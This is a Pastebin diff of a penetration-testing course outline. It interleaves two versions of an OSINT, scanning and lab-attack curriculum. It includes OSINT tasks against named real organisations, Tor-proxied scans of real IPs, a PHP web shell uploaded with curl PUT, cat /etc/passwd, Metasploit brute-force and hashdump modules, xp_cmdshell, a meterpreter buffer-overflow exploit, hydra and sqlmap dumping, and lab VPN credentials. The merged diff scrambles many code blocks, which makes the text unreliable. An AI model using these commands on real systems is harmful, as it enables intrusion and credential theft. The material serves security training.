View difference between Paste ID: <a href="/4rdG7v78">4rdG7v78</a> and <a href="/4EEeEnXe">4EEeEnXe</a> - Pastebin.com

View difference between Paste ID: 4rdG7v78 and 4EEeEnXe

SHOW: | | - or go back to the newest paste.

########################################
########################################################
# Ultimate Penetration Testing         #
# CyberWar: Advanced Offensive Cyber Operations        #
# By Joe McCray of Strategic Security  #
# By Joe McCray of Strategic Security                  #
########################################
########################################################



#########################
# Class Virtual Machine #
#########################


Here is the VMWare virtual machine for the class:
 
https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts





################
# Day 1: OSINT #
################
OK - it's time to get rollin!!!!!! I know that you are probably ready to scan the entire planet but I want you to do some Open Source Intelligence (OSINT) first. 

https://s3.amazonaws.com/infosecaddicts-Files/OSINT_Innophos_11242010.doc

https://s3.amazonaws.com/infosecaddictsfiles/OSINT_Innophos_11242010.doc

Let's see if you can do a better one than me....


Here are a few places to start:

- Wikipedia Page
    - Are they Public or Private?
    - Does the target have any subsidiaries?
    - Who are the key people
 
- Robtex
    - Show system map
    - Are they behind a CDN
 
- Netcraft
    - http://toolbar.netcraft.com/site_report
    - Are they using a Loadbalancer like F5 BigIP, or Citrix NetScaler
 
- Passive Recon (Firefox Add-on)
  Download it from: https://addons.mozilla.org/en-US/firefox/addon/passiverecon/




Your first task:
----------------
Use the OSINT_Innophos doc as a reference and perform/document an OSINT assessment against any one of the following companies: 
NSA
HSBC
Coke
Exxon Mobil
KPMG
Accenture
NewYork-Presbyterian Hospital
Kroger
Dillard's
Royal Caribbean International



Tools that are good for OSINT:
------------------------------
Here are some tools that I think you should consider using for this challenge: 
FOCA
Maltego
Search Diggity
ShodanHQ
PassiveRecon
EDGAR
theHarvester
gxfr.py
VisualRoute




You must create a MS WORD document titled 'FirstName-LastName-Ultimate-Pentesting-Day1-OSINT-Report.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-OSINT-Report.docx).

********************************** Begin Day 1 Homework Part 1 **********************************
NOTE: Creating this OSINT Report IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS


Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.
You must create a MS WORD document titled 'FirstName-LastName-Cyberwar-Day1-OSINT-Report.docx' (ex: Joseph-McCray-CyberWar-Day1-OSINT-Report.docx).

You must spell you name EXACTLY as you want it spelled on your class certificate.

IMPORTANT NOTE:
Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.


********************************** End Day 1 Homework Part 1 **********************************




Email Harvesting
----------------

cd ~/toolz/

rm -rf theharvester-read-only/

sudo apt install -y python-pyasn1 python-pyasn1-modules
     infosecaddicts

git clone https://github.com/laramies/theHarvester.git

cd theHarvester/

python theHarvester.py

python theHarvester.py -d motorola.com -l 50 -b google

python theHarvester.py -d motorola.com -l 50 -b bing

python theHarvester.py -d motorola.com -l 50 -b linkedin

python theHarvester.py -d motorola.com -l 50 -b pgp





File Meta-Data Harvesting
-------------------------
cd ~/toolz/

sudo apt install -y python-pip
     infosecaddicts

sudo pip install google
     infosecaddicts

git clone https://github.com/opsdisk/metagoofil.git

cd metagoofil/


python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles

sudo apt install -y libimage-exiftool-perl

exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u





python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
Whereas:

-d : I used another domain name aside from Google.com to make it work
-t : I asked for the program to search two types of public documents whuch are doc and pdf files
-l : I limited the search result to 100 to make the process faster
-n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
-o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
-f : Save the html links to html_links_<TIMESTAMP>.txt file






Github Info Harvesting
----------------------
cd ~/toolz/

sudo pip install gitem
	infosecaddicts

gitem organization facebook


gitem repository facebook react
Network Topology Enumeration


gitem --processes 4 user zpao
     ** This should give you a rate limit error. You need to create an OAuth token like my example below

gitem -o xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx --processes 4 user zpao


Github Access Token Creation Reference:
https://help.github.com/articles/creating-an-access-token-for-command-line-use/


Network Topology Enumeration (NOTE: This tool may not work anymore due to changes at BING)
------------------------------------------------------------------------------------------

cd ~/toolz/

wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py

python gxfr.py --bxfr --dns-lookup -o
	motorola.com
	[ press enter ]
	cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=

------------------------------------------------------------------------------------------


cd ~/toolz/

rm -rf fierce2/

git clone https://github.com/mschwager/fierce.git

python3 fierce.py --domain facebook.com --subdomains admin --traverse 10


sudo apt install -y python3-pip
	infosecaddicts

sudo pip3 install -r requirements.txt

python3 fierce.py -h

python3 fierce.py --domain motorola.com --subdomains accounts admin ads
Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:

python3 fierce.py --domain facebook.com --subdomains accounts --traverse 10


Limit nearby IP traversal to certain domains with the --search flag:

python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net


Attempt an HTTP connection on domains discovered with the --connect flag:

python3 fierce.py --domain stackoverflow.com --subdomains mail --connect






Recon-NG (Metasploit for Recon):
--------------------------------
cd ~/toolz/

sudo apt install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
	infosecaddicts

sudo pip install dicttoxml
	infosecaddicts



git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
./recon-ng



At the prompt, let's type help in order to look at the commands we can use in Recon-ng.

recon-ng > help


Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.

recon-ng > [ TAB ] [ TAB ] 



To see all the modules in Recon-ng, we can type:

recon-ng > show [ TAB ] [ TAB ] 



Ok, let's drive this thing....

recon-ng > show banner

recon-ng > show companies

recon-ng > show contacts

recon-ng > show credentials

recon-ng > show dashboard

recon-ng > show domains

recon-ng > show hosts

recon-ng > show keys

recon-ng > show leaks

recon-ng > show locations

recon-ng > show modules

recon-ng > show netblocks

recon-ng > show options

recon-ng > show ports

recon-ng > show profiles

recon-ng > show pushpins

recon-ng > show repositories

recon-ng > show schema

recon-ng > show vulnerabilities

recon-ng > show workspaces





When you have found a module that you would like to try the process is fairly straight forward.

Type, “use [Modulename]” to use the module

Type, “show info” to view information about the module

And then, “show options” to see what variables can be set

Set the option variables with “set [variable]”

Finally, type “run” to execute the module

You must create a MS WORD document titled 'FirstName-LastName-Pentester-Ultimate-Pentesting-Day1-Recon-NG.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-Recon-NG.docx).





********************************** Begin Day 1 Homework Part 2 **********************************
NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS


You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.


You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day1-Recon-NG.docx' (ex: Joseph-McCray-Cyberwar-Day1-Recon-NG.docx).

You must spell you name EXACTLY as you want it spelled on your class certificate.


Reference links:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/

IMPORTANT NOTE:
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday May 21st at midnight EST.

********************************** End Day 1 Homework Part 2 **********************************









############################
# Day 2: Advanced Scanning #
############################
Today will be heavily focused on scanning. We're going to scan, then scan again, and then scan some more. When we are doing scanning - we are going to scan some more....




########################
# Scanning Methodology #
########################
 
- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*
     infosecaddicts
 
    -if -SP yields no results try:

sudo nmap -sL 157.166.226.*
     infosecaddicts
 
sudo nmap -sL 157.166.226.* | grep com
     infosecaddicts
# Day 1: 3rd Party Scanning, and scanning via proxies #

- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247
     infosecaddicts
 
 
- Bannergrab/Version Query
What versions of software are running
-------------------------------------
cd /home/infosecaddicts/toolz/

perl proxyfinder-0.3.pl multiproxy 3 proxies.txt    <-- This takes a long time to run

 
 
- Vulnerability Research
sudo vi /etc/proxychains.conf               <--- Make sure that last line of the file is: socks4  127.0.0.1 9050

----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/

Example lookup for this scan would be:
vi ~/toolz/fix-proxychains-dns.sh
https://web.nvd.nist.gov/view/vuln/search-results?query=nginx&search_type=all&cves=on
 
 
# This script is called by proxychains to resolve DNS names

# DNS server used to resolve names

# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html

DNS_SERVER=4.2.2.2
NOTE:
Gereon, gave us a nice tip today about using IPTables ConnTrack:
if [ $# = 0 ] ; then
iptables -I INPUT -m state -p icmp --echo-type echo-reply -j ACCEPT --state RELATED 
echo " usage:"

echo " proxyresolv <hostname> "
His point was that if you only accept echo-reply by related/state related all of the bogus answers will be dropped as the TTL decrement will be out of whack.
exit

fi
You can see this point with another tool. I'll get you the syntax later today.

export LD_PRELOAD=libproxychains.so.3

dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'

-----------------------------------------------------------------------

# Day 2: 3rd Party Scanning, and scanning via proxies #
#######################################################
 
https://www.shodan.io/
 
tor-resolve infosecaddicts.com

 
    net:129.188.8.0/24
 
 
 
 

Scanning via Tor/proxychains
----------------------------
sudo apt install -y tor proxychains ntpdate

sudo vi /etc/proxychains.conf				<--- Make sure that last line of the file is: Socks4  127.0.0.1 9050

sudo ntpdate pool.ntp.org
	infosecaddicts

tor-resolve room362.com

proxychains nmap -sT -p80 162.243.126.247

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247







------------------------------------------------------
cd ~/toolz
git clone https://github.com/sensepost/glypeahead.git
cd glypeahead/
vi config.php

****make the following change****
'proxies'       =>      array(
                'https://branon.co.uk/glype/desktop-free/index.php',		<--- line 40
                'http://ricardoalcala.com/index.php',
        )


php glypeahead config.php




#########################
# Playing with Nmap NSE #
    return "Ultimate Pentesting!"

 
nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
 
nmap -p80 --script dns-brute infosecaddicts.com
 
nmap --script http-robtex-reverse-ip secore.info
 
nmap -Pn -p80 --script=http-headers infosecaddicts.com
 
 
ls /usr/share/nmap/scripts | grep http
nmap -Pn -p80 --script=http-* infosecaddicts.com



 







    return "Ultimate Pentesting!"



###################################
# Day 2: Scanning the lab network #
###################################

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. 
If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf 
vpn username: {first_initial.last_name}  example: j.mccray
vpn password: vpnVPN1234!@#$


sudo nmap -sP 10.0.0.0/24
     infosecaddicts


sudo nmap -sL 10.0.0.0/24
     infosecaddicts

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254



wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

sudo cp propecia /bin
     infosecaddicts

propecia 10.0.0 22

propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cat ~/labnet-ip-list.txt

#################################################
# Screenshotting the Web Servers in the Network #
#################################################
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/
 
 
wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
cd wkhtmltox/bin/
sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
 
 
cd ~/toolz/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/

sudo cp http-screenshot.nse /usr/share/nmap/scripts/
     infosecaddicts
 
sudo nmap --script-updatedb
     infosecaddicts
 
 
cd ~/toolz/labscreenshots/
sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
     infosecaddicts
 
 
 
 
vi screenshots.sh
 
#!/bin/bash
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
 
 
 
 
 
sh screenshots.sh


python -m SimpleHTTPServer


--- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html):
http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html




##########################
# Nmap NSE tricks to try #
##########################
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
     infosecaddicts

********************************** Begin Day 1 Homework Part 3 **********************************

     infosecaddicts

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
     infosecaddicts
You must create a MS WORD document titled 'FirstName-LastName-Pentester-Ultimate-Pentesting-Day1-Adv-Scanning.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-Adv-Scanning.docx).

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
     infosecaddicts


Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.

     infosecaddicts
********************************** End Day 1 Homework Part 3 **********************************


#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################

 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
-- The Rule Section --
# Day 2: #

    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end
 
-- The Action Section --
action = function(host, port)
https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf 
    return "CyberWar!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
 
 
 
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
 
-- The Rule Section --
portrule = shortport.http
 
 
-- The Action Section --
action = function(host, port)
    return "CyberWar!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
 
 
 
 
 
 
 
OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        return response.body
    end
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
 
 
 
 
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
 
 
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
-- The Rule Section --
mkdir ~/toolz/wordlists

cd ~/toolz/wordlists

echo dbo >> users.txt

echo sa >> users.txt

echo admin >> users.txt

echo root >> users.txt

echo password >> pass.txt

echo pass >> pass.txt

echo hello >> pass.txt

echo goodbye >> pass.txt

echo test >> pass.txt

echo admin >> pass.txt

echo db >> pass.txt

echo god >> pass.txt

echo 123 >> pass.txt

echo letmein >> pass.txt

    end
end
 
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
# Attacking Databases #


Attacking MySQL with Metasploit

-------------------------------
********************************** Begin Day 2 Homework Part 1 **********************************
NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS

You must take screenshots of you performing all of the scanning tasks that we have done so far today

use auxiliary/scanner/mysql/mysql_version
You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day2-Adv-Scanning.docx' (ex: Joseph-McCray-CyberWar-Day2-Adv-Scanning.docx).
set RHOSTS 10.0.0.59

You must spell you name EXACTLY as you want it spelled on your class certificate.

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 10.0.0.59
Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.
set USER_FILE /home/infosecaddicts/toolz/wordlists/users.txt

set PASS_FILE /home/infosecaddicts/toolz/wordlists/pass.txt
********************************** End Day 2 Homework Part 1 **********************************


use auxiliary/admin/mysql/mysql_enum

set RHOST 10.0.0.59

set USERNAME root


##########
use auxiliary/scanner/mysql/mysql_hashdump

set RHOSTS 10.0.0.59

set USERNAME root
Today I gave the students access to a folder in my Google Drive that allowed the students to share data and they also joined https://chat.strategicsec.com/channel/cyberwar so they can communicate with each other. 

The goal for today is for the class to attack 10.0.0.14 together and see what they can learn.
exit -y



$ mysql -h 10.0.0.59 -u root -p

show databases;
# Attacking 10.0.0.14 #
#######################

Step 1: Nmap Scan

sudo nmap -sV -Pn 10.0.0.14
Attacking Postgres with Metasploit

----------------------------------


Step 2: Nikto Scan

cd ~/toolz
use auxiliary/scanner/postgres/postgres_login
rm -rf nikto/
set RHOSTS 10.0.0.59
sudo apt install -y nikto
nikto -h 10.0.0.14


Step 3: Directory Bruteforce
https://sourceforge.net/projects/dirbuster/
Identifying MSSQL Server

-----------------------


propecia 10.0.0 1433
Step 4: Enumerate Server options (confirm nikto results)

curl -vX OPTIONS 10.0.0.14/test
mkdir webshellz
cd webshellz/
Determine the Version
vi cmd.php
---------------------

---------------------------------------------
nmap -sV -p 1433 10.0.0.9
<HTML><BODY>
nmap -sV -p 1433 --script=ms-sql-info 10.0.0.9
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
Bruteforcing MSSQL
<pre>
------------------
<?
if($_GET['cmd']) {
nmap -p1433 --script ms-sql-empty-password 10.0.0.9
  system($_GET['cmd']);
  }
?>
mkdir ~/toolz/wordlists
</pre>
cd ~/toolz/wordlists
</BODY></HTML>
echo dbo >> customuser.txt
---------------------------------------------
echo sa >> customuser.txt

echo admin >> customuser.txt

echo password >> custompass.txt

echo pass >> custompass.txt
curl -vX PUT -d "$(cat cmd.php)" 10.0.0.14/test/cmd.php
echo hello >> custompass.txt

echo goodbye >> custompass.txt

echo test >> custompass.txt

echo admin >> custompass.txt

echo db >> custompass.txt
Now use your web browser to browse to page:
echo god >> custompass.txt
http://10.0.0.14/test/cmd.php
echo 123 >> custompass.txt

echo letmein >> custompass.txt

echo database!23 >> custompass.txt
Enter the following commands:
/sbin/ifconfig
pwd
id
uname -a
nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 10.0.0.9
cat /etc/passwd



Extracting Data From MSSQL
Figure out how to root this box!!!!!!!!!!!!!!!!

nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9


nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
######################
# Attacking 10.0.0.5 #
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
######################

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
Step 1: Nmap Scan

nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa,mssql.password=database\!23 10.0.0.9
sudo nmap -sV -Pn 10.0.0.5

nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9


Step 2: Nikto Scan

cd ~/toolz

perl nikto.pl -h 10.0.0.5
Attacking MSSQL Server With Metasploit

--------------------------------------
cd /home/infosecaddicts/toolz/sqlmap-dev

python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 -s ./scan_report_pgsql.txt -t ./scan_trace_pgsql.txt --skip-urlencode


use auxiliary/admin/mssql/mssql_sql
Security Issue 1: Directory Browsing
------------------------------------
show options
http://10.0.0.5/bin/

set RHOST 10.0.0.9
Browse to this URL in your web browser.

set username sa

You may want to go for a hail mary and decompile the DLL files with something like JetPack: https://www.jetbrains.com/decompiler/ but don't get your hopes up.
set password database!23


Attacking 10.0.0.5 with SQLMap
------------------------------
cd /home/infosecaddicts/toolz/sqlmap-dev
python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode

cd /home/infosecaddicts/.sqlmap/output/10.0.0.5
ls

cd ~/toolz/sqlmap-dev/
python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs
use auxiliary/admin/mssql/mssql_enum

python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user
show options

python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --passwords
set RHOST 10.0.0.9

python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --current-db --tables
set username sa

python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --current-db --tables --dump
set password database!23



################################
# Attacking Big Data Solutions #
################################

propecia 10.0.0 27017
use auxiliary/admin/mssql/mssql_exec


show options

     infosecaddicts
set RHOST 10.0.0.9


set password database!23


set CMD cmd.exe /c ping localhost

There are others like CouchDB, and Cassandra, but for right now let's play with MongoDB.

One of the huge red flags with MongoDB is that its default configuration it has no user authentication, and no permissions.



sudo apt install -y git python-setuptools

cd ~/toolz

mkdir arsenal

cd arsenal

git clone https://github.com/tcstool/nosqlmap.git

cd nosqlmap

sudo python setup.py install
     infosecaddicts

python nosqlmap.py
1

1					(set options)
	10.0.0.8			(set target IP)


7	<your IP>			(set attacker host ip)


x					(back to main menu)

2					(DB access attack option)


1					(Get server info)


2					(Enumerate Databases/Collections/Users)


3					(Check for GridFS)
					GridFS is a specification for storing and retrieving files that exceed the BSON-document size limit of 16MB. Instead of storing a file in a single document, GridFS divides a file into parts, or chunks [1], and stores each chunk as a separate document


	10.0.0.59			(set target IP)



Other attack options such as clone a database will require you to have a local copy of MongoDB installed, and the Metasploit attack is for too old of a version ( < 2.2.4 ).




********************************** Begin Day 3 Homework Part 1 **********************************
NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS

You must take screenshots of you performing all of the scanning tasks that we have done so far today

You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day3.docx' (ex: Joseph-McCray-CyberWar-Day3.docx).

You must spell you name EXACTLY as you want it spelled on your class certificate.

IMPORTANT NOTE:
Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.

********************************** End Day 3 Homework Part 1 **********************************



##########
# Day 4: #
##########



######################
# Attacking 10.0.0.7 #
######################

Step 1: Nmap Scan
nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
sudo nmap -Pn -sV -T 5 10.0.0.7

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

Step 2: Open a browswer
	https://www.exploit-db.com/search
Point your browser to http://10.0.0.7/

	Search for:

	Savant httpd 3.1
Step 3: Download the picture in the website:
	Apache httpd 2.0.58 ((Win32))
wget http://10.0.0.7/main.gif
exiftool main.gif

	Found one written in Python:

	https://www.exploit-db.com/exploits/18401/
Step 4: What's the password

	Found one for Savant 3.1 from Metasploit:
Point your browser to http://10.0.0.7/kzMb5nVYJw/ and then view source.
	https://www.exploit-db.com/exploits/16770/

From there you'll see that it tells you that the password is a simple one.


cd ~/toolz/
echo dbo >> list.txt
use exploit/windows/http/savant_31_overflow
echo sa >> list.txt
echo admin >> list.txt
set PAYLOAD windows/meterpreter/bind_nonx_tcp
echo root >> list.txt
set RPORT 80
echo password >> list.txt
set LPORT 7777
echo pass >> list.txt
echo hello >> list.txt
echo goodbye >> list.txt
echo test >> list.txt
echo admin >> list.txt
echo elite >> list.txt
echo db >> list.txt
echo god >> list.txt
echo 123 >> list.txt
echo letmein >> list.txt
echo omega >> list.txt



hydra -l none -P list.txt 10.0.0.7 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"


cd ~/toolz/sqlmap-dev/

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a --dbs


python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql --tables

python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql -T user --columns

